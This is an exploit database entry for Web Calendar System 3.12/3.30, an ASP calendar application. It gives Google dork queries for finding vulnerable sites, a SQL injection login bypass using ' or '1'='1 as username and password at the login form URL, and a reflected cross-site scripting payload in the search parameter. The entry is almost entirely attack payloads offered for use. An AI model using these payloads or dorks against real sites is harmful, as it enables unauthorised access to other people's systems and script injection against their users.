Web Calendar System 3.12/3.30 Multiple Remote Vulnerabilities



EDB-ID: 7242 CVE: 2004-1552OSVDB-ID: 10334
Author: Bl@ckbe@rDPublished: 2008-11-27Verified: Verified
Exploit Code:   DownloadVulnerable App:   N/A

Rating

(0.0)
Prev Home Next
000000  00000     0000    0000  000  00 000000  0000000   0000  000000  00000
 0    0   0      0    0  0    0  0   0   0    0  0    0  0    0  0    0  0   0
 0    0   0     0  00 0 0        0  0    0    0  0      0  00 0  0    0  0    0
 0    0   0     0 0 0 0 0        0  0    0    0  0  0   0 0 0 0  0    0  0    0
 00000    0     0 0 0 0 0        0 0     00000   0000   0 0 0 0  00000   0    0
 0    0   0     0 0 0 0 0        000     0    0  0  0   0 0 0 0  0  0    0    0
 0    0   0     0  000  0        0  0    0    0  0      0  000   0  0    0    0
 0    0   0   0  0       0    0  0   0   0    0  0    0  0       0   0   0   0
000000  0000000   000     0000  000  00 000000  0000000   000   000  00 00000
[+] Script               : Web Calendar System v 3.12/3.30
[+] Exploit Type         : Multiple Exploits (XSS + remote bypass Exploit)
[+] Google Dork          : intitle:Web Calendar system v 3.30        inurl:.asp
[+] Google Dork          : intitle:Web Calendar system v 3.12        inurl:.asp
[+] Contact              : blackbeard-sql@hotmail.fr
--//--> Exploit :
1) Remote Bypass Exploit :
http://[website]/[script]/db/agenda/calendar.asp?DoAction=USER&Change=LOGINFORM
username:' or '1'='1
password:' or '1'='1
2) Remote XSS exploit :
In simple words :
http://[website]/[script]/CALENDAR.ASP?DoAction=Calendar&View=Search&SText=<script>alert('Bl@ckbe@rD is not dead yet')</script>[Peace xD ]
# milw0rm.com [2008-11-27]






Comments

No comments so far